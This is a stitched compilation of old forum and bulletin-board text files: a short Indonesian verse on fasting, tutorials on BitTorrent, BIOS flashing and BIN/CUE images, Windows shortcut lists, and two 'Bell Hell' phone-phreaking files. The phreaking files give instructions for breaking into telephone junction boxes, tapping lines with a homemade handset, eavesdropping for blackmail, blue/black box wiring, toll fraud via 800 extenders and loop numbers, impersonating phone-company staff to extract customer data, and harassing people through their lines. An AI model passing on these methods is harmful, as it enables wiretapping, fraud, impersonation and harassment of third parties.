puasa

shiyam=puasa=imsak=menahan=sabar
sabar adalah pelita
shalat adalah cahaya
sabar kunci kebahagiaan
sabar dan shalat adalah penolong bagi orang-orang yang beriman
Allah bersama orang-orang yang sabar

Bit Torrent

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

BIOS Update Procedure

BIOS Update Procedure

All latest Motherboards today, 486/ Pentium / Pentium Pro etc.,ensure that upgrades are easily obtained by incorporating the system BIOS in a FLASH Memory component. With FLASH BIOS, there is no need to replace an EPROM component. Once downloaded, the upgrade utility fits on a floppy disc allowing the user to save, verify and update the system BIOS. A hard drive or a network drive can also be used to run the newer upgrade utilities. However, memory managers can not be installed while upgrading.

Most pre-Pentium motherboards do not have a Flash BIOS. The following instructions therefore do not apply to these boards. If your motherboard does not have a Flash BIOS (EEPROM) you will need to use an EPROM programmer to re-program the BIOS chip. See your dealer for more information about this.

Please read the following instructions in full before starting a Flash BIOS upgrade:
A. Create a Bootable Floppy (in DOS)

•With a non-formatted disk, type the following:

format a:/s

•If using a formatted disk, type:

sys a:

This procedure will ensure a clean boot when you are flashing the new BIOS.

B. Download the BIOS file

•Download the correct BIOS file by clicking on the file name of the BIOS file you wish to download.

•Save the BIOS file and the Flash Utility file in the boot disk you have created. Unzip the BIOS file and the flash utility file. If you don't have an "unzip" utility, download the WinZip for Windows 95 shareware/ evaluation copy for that one time use from _www.winzip.com or _www.pkware.com. Most CD ROMs found in computer magazines, have a shareware version of WinZip on them.

•You should have extracted two files:

Flash BIOS utility eg: flash7265.exe (for example)

BIOS eg: 6152J900.bin (example)

Use the latest flash utility available unless otherwise specified (either on the BIOS update page or in the archive file). This information is usually provided.

C. Upgrade the System BIOS

During boot up, write down the old BIOS version because you will need to use it for the BIOS backup file name.

Place the bootable floppy disk containing the BIOS file and the Flash Utility in drive a, and reboot the system in MS-DOS, preferably Version 6.22

•At the A:> prompt, type the corresponding Flash BIOS utility and the BIOS file with its extension.

For example:

flash625 615j900.bin

•From the Flash Memory Writer menu, select "Y" to "Do you want to save BIOS?" if you want to save (back up) your current BIOS (strongly recommended), then type the name of your current BIOS and its extension after FILE NAME TO SAVE: eg: a:\613J900.bin

Alternatively select "N" if you don't want to save your current BIOS. Beware, though, that you won't be able to recover from a possible failure.

•Select "Y" to "Are you sure to program?"

•Wait until it displays "Message: Power Off or Reset the system"

Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system. If you write to BIOS but cannot complete the procedure, do not switch off, because the computer will not be able to boo, and you will not be given another chance to flash. In this case leave your system on until you resolve the problem (flashing BIOS with old file is a possible solution, provided you've made a backup before)

Make sure the new BIOS version has been loaded properly by taking note of the BIOS identifier as the system is rebooting.

For AMI BIOS
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system holding the "END" key prior to power on until you enter CMOS setup. If you do not do this the first time booting up after upgrading the BIOS, the system will hang.

BIOS Update Tips
note:
1.Make sure never to turn off or reset your computer during the flash process. This will corrupt the BIOS data. We also recommend that you make a copy of your current BIOS on the bootable floppy so you can reflash it if you need to. (This option is not available when flashing an AMI BIOS).

2. If you have problems installing your new BIOS please check the following:

Have you done a clean boot?
In other words, did you follow the above procedure for making a bootable floppy? This ensures that when booting from "A" there are no device drivers on the diskette. Failing to do a clean boot is the most common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS.

If you have not used a bootable floppy, insure a clean boot either by

a) pressing F5 during bootup

b) by removing all device drivers on the CONFIG.SYS including the HIMEM.SYS. Do this by using the EDIT command.

Have you booted up under DOS?
Booting in Windows is another common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS. Make sure to boot up to DOS with a minimum set of drivers. Important: Booting in DOS does not mean selecting "Restart computer in MS-DOS Mode" from Windows98/95 shutdown menu or going to Prompt mode in WindowsNT, but rather following the above procedure (format a: /s and rebooting from a:\).

Have you entered the full file name of the flash utility and the BIOS plus its extension?
Do not forget that often you will need to add a drive letter (a:\) before flashing the BIOS. Example: when asked for file name of new BIOS file which is on your floppy disk, in case you're working from c:\ your will need to type a:\615j900.bin, rather than 615j900.bin only.

BIN & .CUE simple

BIN & .CUE simple tutorial.

There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.

So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.

BURN TO CD

You will need either NERO, CDRWIN or FIREBURNER to burn the file.

To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up, for anything other than music make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.

To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.

To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and chooseselect "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.

.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:

FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00

Delete everything in the quotes, in this case we would
delete name of file.bin. Now place the title you copied
in between the quotes. Save the changes and close out.
Thats it, your .cue file should work now.

OTHER WAYS TO USE .BIN & .CUE FILES

VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.

Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.

ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________

best keyboard shortcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

Bell Hell Volume #2

///////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////
///// ** M \\\\\\
\\\\\ ** Bell Hell Volume #2 METAL! E //////
///// ** KICKS! T \\\\\\
\\\\\ ************ By: The Dutchman A C //////
///// Neon**Knights -Wired L O \\\\\\
\\\\\ ** M //////
///// ** Thanx to: Baby Demon & The Metallian M \\\\\\
\\\\\ ** U //////
///// ** Call These Genocidal Systems... N \\\\\\
\\\\\ ** I //////
///// /\/\etalland 1 10mgs/AE/BBS/Cat-Fur[503]538-0761 C \\\\\\
\\\\\ /\/\etalland ][ AE/Cat-Fur Line.....[503]253-5300 A //////
///// The /\/\etal AE PW: KILL............[201]879-6668 T \\\\\\
\\\\\ The Cheese ][ 10mgs/AE/BBS/Cat-Fur[409]696-7983 I //////
///// Milliways 10mgs BBS...........[609]921-1994 O \\\\\\
\\\\\ 7 Gates of Hell BBS.................[415]697-1320 N //////
///// The Mordor AE 1200bps/Cat-Fur/10mg[201]528-6467 S \\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////
///////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


/CONTENTS/
In vol. I we discussed some of the minor aspects of bell hell. Now we shall
enter the realm of serious bell hell, including how to crush AT&T's firm grip
on the wired industry and Ma's underground passages.

/MA'S CODES ETC./
In order to make things easier for her employees, Ma has given us not only
free access to almost all her treasures but guides next to them to help us
along the way. One of the more common boxes found are the ones located either
at the end of your street, in an adjacent field or on telephone poles. Any of
these boxes contains all the lines for the surrounding neighbourhood. Ma
usually supplys a code for the wires inside on the side of the door to one of
these boxes, if not the code usually goes like this:

Red (ring-) = Ring line, allows others to call you
Green (tip+) = Calling out line, for you to call others

Ma has conveniently located these, the red on the right and the green on the
left. If you run into one of these boxes and it's locked then you'll need to
purchase is either a 1/2" crowbar or an 7/16" hex driver, prefferably the
latter. In order to use the 7/16, simply give a 1/8" turn counter clockwise,
presto you are in. The crowbar is self explanatory I believe.

The other, and less likely to be found of the bell underground network is just
that, the underground network. To find one of these simply look for a manhole
cover with a bell in the middle instead of an S or what-ever you sanitary
dept. might use. The aspects and entry of these will be discussed later in
this article, now to the boxes.

Now that you are in one of these boxes there is a rather interesting list of
prospects you can do, connect a linesmans handset, connect a box, or eavesdrop
to name a few, here's some of the ways to do the following.

Hell #1:

/LINESMANS HANDSET/
In order to make a linesmans handset (if not included within the newly found
box) you'll need a few things:

1 a phone (prefferably a GTE flip fone or a slimline)
2 a spliceing knife (any knife will do, the sharper the better)
3 a set of alligator clamps (if not already within the box)

Now take your knife and cut off all the wires and the modular jack (if one)
saving the red (ring-) and green (tip+) wires. Now attach the alligator clips,
one to the red and one to the green, and your set. All you need do is attach
the alligator clips to the designated colors on the box (red - red/green -
green) and you have essentially become an extension of that line.

Hell #2:

/THE BLACK/BLUE BOX/
Finally a place where you can use that box of yours with minimal worries of
being caught (the only way would be to get caught red-handed). Ah yes, bell
hell at one of its finer points. Commonly it takes Ma about a month or so to
figure out the trip on this one.

If you are unfamilar with boxes, the black box allows others to call you free
where-as the blue box allows you to use operator lines and even become one of
the bitches (become an operator). For more info I would suggest consulting
black/blue box plans.

Use the normal plans for a black/blue box and make the following
modifications:

Equipment:
(1) SPST SWITCH (found at your local Trash Shack)
(1) 10K OHM 1/2 WATT 10% RESISTOR (same as above)
SOME EXTRA WIRE (same as above above)

Now disconnect the green wire in the box and connect it to one of the two
poles on the SPST switch. Take a piece of your extra wire connect one end to
the other pole on your SPST switch and the other end to the terminal. Now
place the 10k ohm resistor between the terminal and the terminal.
Connect it (the 10k ohm resistor) via wire to the two. The terminal
should have a green wire going to it and the terminal should have a white
and blue wire connected to it. Your finished product should look something
like this:

--/-/--
:S P S T:
-------
:: ::
-----GREEN WIRE--:: ::----
!
10K OHM
!
!
-----WHITE WIRE-----------\\
------BLUE WIRE-----------------

This is simply the basic wiring, if you decide to become one with advancement
you might try hooking up lights to go on when your online or perhaps a
recorder, what-ever you wish.

Hell #3

/EAVES-DROPPING/
There are many various ways to accomplish this, seeing how I like to stick to
basics I will describe what I feel is the easiest by far. First you need to
make a linesmans handset as mentioned above if you already haven't. Now simply
disconnect the sending end (the end you talk through) and listen in. From here
you can accomplish several various tasks. If you are into blackmail you can
hook up a tape recorder (if you want to do this you can leave me a msg. or
wait for another file later, its rather a long task) or you may simply hold
the recorder to the listening end of the phone. To find out about the line
etc. You can do a couple of things, first you can dial your ANI (automatic
number identification) and find out the line you are on, after this call, you
are a local CN/A (described below) and run a check on who's line it is etc.
This can bring all kinds of hell for those not-so-trustworthy wifes/husbands.

More Hell:

/OTHER TRICKS/
You can set up a conference call simply by dialing your conference operator
(0-700-456-1000) and setting it up, just do what she says. I suggest this
operator for her lines are superior to those of the bitchy PBX ones. Oh,
you'll also need to know that lines person, address etc. Just pull an ANI and
then an CN/A on it.

If you have an urge to get back at someone simply attach your linesmans
handset to the persons line (fine their line as mentioned many times before)
and leave it off the hook. You can imagine just how long it could take Ma's
loyal employees to discover the problem. Possibly weeks if not a month.

Using the persons line to call computer systems that trace. This also goes
under the heading 'getting back at people' for the hassles you'll cause them
when the line is traced to them is numerous, bitchy Ma employees tend to be
irrational, spoiled children when it comes to busting people.

Bugging the operator - self explanatory.

RAISE HELL

/Insider/ - The rest of this doc is mainly explanations, a little hell and a
few other things I decided to throw in instead of making another Vol.. It's
true purpose is to coincide with Vol. I, as well as take up space, the rest is
unknown.

-----------
800 EXTENDERS
-----------

Basically, 800 extenders are much like Save-Net or Am-Net going 800 instead of
local access numbers. With this one you can call anywhere in the U.S. for
free, of course you need the X digit code, but this is easily found. You use
these just like you would if you were using Save-Net, i.e. you would dial
1-800-XXX-XXXX, then enter in your X digit code and then the area code + the
number you wish to reach, i.e. 1800521167429125036358443, as you can see there
is an 800 number followed by a 4 digit code followed by a number wished to be
reached. Here's a few 800 extenders, theres many many more:

1-800- 1-800-
------- -------
245-4890 4 DIGITS 327-6713 4 DIGITS
243-7650 6 DIGITS 328-7112 4 DIGITS
654-8494 6 DIGITS 327-9895 7 DIGITS
327-9136 4 DIGITS 227-3414 4 DIGITS
682-4000 6 DIGITS 343-1844 4 DIGITS
858-9000 3 DIGITS 521-1674 4 DIGITS
537-3511 8 DIGITS 843-0698 9 dIGITS

=-=-=-=-=-=-=------------------------->
LOOP NUMBERS EXPLORED

Loop numbers simply connect two people together using two different numbers.
Thus these numbers always come in pairs, one being the higher one while the
other being the lower one. So if you were to use one, you would call one of
the pair and the other one would call the other one (you take the high road
I'll take the low road). Loop numbers are equal in quality as calling direct,
thus it would be the same quality as you would get calling your neighbour. If
you would happen to call a loop number and no one was on the other end one of
two things would happen, if you called the higher of the two you would here
silence, if you dialed the lower you would get a 1000 hertz tone. Heres a list
of some loop numbers:

Area Code 212
XXX-9979 (HIGH)
XXX-9977 (LOW)

XXX= 690,534,569,432,868,255,228,677,982,466,926,220,586,524,283

XXX-9906 (HIGH)
XXX-9900 (LOW)

XXX= 529,352,439,388

Where you see XXX you enter the prefix desired, thus if you wanted area code
212, you could choose a prefix say 690, so one person would dial 690-9906 and
the other 690-9900.

In order to scan for loop numbers you'll need a friend to help. Loop numbers
run in pairs, the combination is 00XX and XX99. So what you need is for one
person to scan one end while the other scans the upper (using the same
prefix). The hang side has no tone while the other gives off a 1000hz tone.

To use a loop number in order to start a conference call simply have one
person get on the hangside while another calls the conferenceing operator (PBX
operator will do). The person calling the operator (hopefully from a fortress
phone) should charge the call to the upper loop number (the one the other
person isn't on), when the operator calls to verify she'll get your freind,
who of course will accept all charges gladly.

=-=-=-=-=-=-=------------------------->
Customer name and address
(CN/A)

A CN/A operator is disagnated for the use of AT&T employees who need some
information on a certain person. Ex- A Bell cop got a persons name from a nark
or whatever, he needs more info about the person so he calls up the CN/A
operator and asks her for the persons where abouts. Ma has been nice enough to
grant these operators the knowledge of a few more things (Ma's slip up), such
as their phone number. Thus we can call up one of these operators, say,'Hi, my
names Joe Rodrequiz and I'm from the Lake Oswego Bell customer service
department, I need the following info on a 'Jack Suchos'.' Then you become
really nice and ask if you can have that persons phone number so you don't
have to go over there. Since these operators are human, and are easily conned
and are very informed they'll give you just about whatever you need to know.
However you must be polite and business like. Following is a list of CN/A's,
to use it, find your area code and the CN/A operators number will follow:

DUTCHMAN DIRECTORY
AREA CODE PHONE NUMBER
---------- ---------------
201 201-676-7070
202 301-384-9820
203 203-789-6815
204 204-949-0900
205 205-988-7000
206 206-382-8000
207 617-787-2750
208 303-399-4200
209 415-546-1341
212 518-471-8111
213 213-501-4144
214 214-948-5731
215 412-633-5600
216 614-464-2345
217 217-525-7000
218 402-345-0600
219 317-265-4834
301 301-534-1168
302 412-633-5600
303 303-399-4200
304 304-344-8041
305 912-784-9111
306 NONE....NONE
307 303-399-4200
308 402-345-0600
309 217-525-7000
312 312-796-9600
313 313-223-8690
314 314-726-7142
315 518-471-8111
316 816-275-2782
317 317-265-4834
318 318-227-1551
319 402-345-0600
401 617-787-2760
402 402-345-0600
403 403-425-2652
404 912-784-9111
405 405-236-6121
406 303-399-4200
408 415-546-1132
412 412-633-5600
413 617=787-2760
414 608-252-6932
415 415-546-1132
416 416-922-6686
417 314-726-7142
418 514-861-2635
419 614-464-2345
501 405-236-6121
502 502-583-2861
503 203-784-6815
504 504-245-5330
505 303-399-4200
506 506-657-3855
507 402-345-0600
509 206=382-8000
512 512-828-2501
513 714-464-2345
514 514-861-2635
515 402-345-0600
516 518-471-8111
517 313-223-8690
518 518-471-8000
519 416-922-6686
601 601-961-0877
602 303-399-4200
603 617-787-2750
604 604-432-2996
605 402-345-0600
606 502-583-2681
607 518-471-8111
608 608-252-6932
609 201-676-7070
612 402-345-0600
613 416-922-6686
614 614-464-2345
615 615-373-5791
616 313-223-8690
617 617-787-2750
618 217-525-7000
701 402-345-0600
702 415-546-1341
703 804-747-1411
704 912-784-9111
705 416-922-6686
707 415-546-1132
709 NONE....NONE
712 402-345-0600
713 713-820-4112
714 213-501-4144
715 608-252-6932
716 518-471-8111
717 412-633-5600
801 303-399-4200
802 617-787-2750
803 912-784-9111
804 804-747-1411
805 415-546-1341
806 512-828-2501
807 416-922-6686
808 212-334-4336
809 LIST BELOW
812 317-265-4834
813 813-223-9678
814 412-633-5600
815 217-525-7000
816 816-275-2782
817 214-948-5731
819 514-861-2635
901 615-373-5791
902 902-421-4110
903 NONE....NONE
904 912-784-9111
906 313-223-8690
907 NONE....NONE
912 912-784-9111
913 816-275-2782
914 518-471-8111
915 512-828-2501
916 415-546-1341
918 405-236-6121
919 912-784-9111

900+(DIAL-IT) NUMBERS: 212-334-3611

FOR BAHAMAS, BERMUDA, DOMINICAN REP, JAMAICA AND PUERTO RICO: 212-334-4336

Downloaded From P-80 Systems 304-744-2253

Bell Hell Volume #1

////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**////////////////////////////////////////
///// ** M \\\\\\
\\\\\ ** Bell Hell Volume #1 E //////
///// ** T \\\\\\
\\\\\ ************ By: The Dutchman A C //////
///// Neon**Knights -Wired L O \\\\\\
\\\\\ ** M //////
///// ** Thanx to: Baby Demon & The Metallian M \\\\\\
\\\\\ ** U //////
///// ** Call These Genocidal Systems... N \\\\\\
\\\\\ ** 0 I //////
///// ** /\/\etalland 1 10mgs/AE/BBS/Cat-Fur[503]538-0761 C \\\\\\
\\\\\ /\/\etalland ][ AE/Cat-Fur Line.....[503]253-5300 A //////
///// METAL! The /\/\etal AE PW: KILL./..........[201]879-6668 T \\\\\\
\\\\\ KICKS! The Cheese ][ 10mgs/AE/BBS/Cat-Fur[409]696-7983 I //////
///// Milliways 10mgs BBS...........[609]921-1994 O \\\\\\
\\\\\ 7 Gates of Hell BBS.................[415]697-1320 N //////
///// The Mordor AE 1200bps/Cat-Fur/10mg[201]528-6467 S \\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////////
/////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\



PREFACE: In this issue will discuss the different types of operators, area
codes and special numbers. This edition is made to give you a basic
understanding of the wicked ways of MA. I hope it'll give you a good enough
back ground to do well. Look for Bell Hell vol. 2 for more info on hacking.



=-=-=-=-=
OPERATORS:
=-=-=-=-=

Here we'll go over in detail some of the most common operators.

TSPS OPERATOR:

Trafic (us) Service Position System Operator is the bitch you commonly here
whenever you use a pay phone etc. To say the least she's a meat head. Her
responsibilities are as follows:

[1] Getting all billing information for Calling Cards and 3rd number calls.

[2] Making sure you get the right person on person-to-person calls.

[3] Making sure the fool on the other end will pay for your collect call (why
call collect?)

[4] Identifying calling numbers, or basically asking you,
'what number are you calling, please.' when the system fucks up.

Even though these operators are commonly ding-bats, you shouldn't screw with
them, for they are known to be quick with the tracer. She can even tell if you
are calling from a fortress phone. She has a portable all time ready tracer.
Beware of these deadly bitches.

INWARD OPERATORS:

This wench is basically an apprentice to the bitch above (TSPS) or commonly
the '0' operator. She will never question you as long as you are within her
dimension (service) area. She can only be reached by a mighty Blue Box
(discussed in up and coming tutorial) or another operator.

DIRECTORY ASSISTANCE OPERATORS:
(DOA?DAO?)

This is the operator you get when you call directory assistance (555-1212).
All she can do is either tell you a listed number or tell you if a number is
unlisted. Waste of time.

DEAF D.A.O.'S

This neat little operator is set up to help with directory assistance for deaf
people (who would they want to talk to?). She's reachable by dialing
800-855-1155. She talks to the deaf via Teletypewriters (terminals). If your
modem can transfer baudot (Oh those sweet Apple Cats can) then you can talk to
her. You might find her alot more friendly, more talkitive, and alot easier to
manipulate a number out of. However, she does use abbreviations like GA for go
ahead (pretty tricky huh).

CN/A OPERATORS

Oh the sweet CN/A, god bless its soul. These operators instead of giving you
information on a persons phone number, they give you information on a phone
numbers person (the person at 503-229-7600). However, if manipulated these
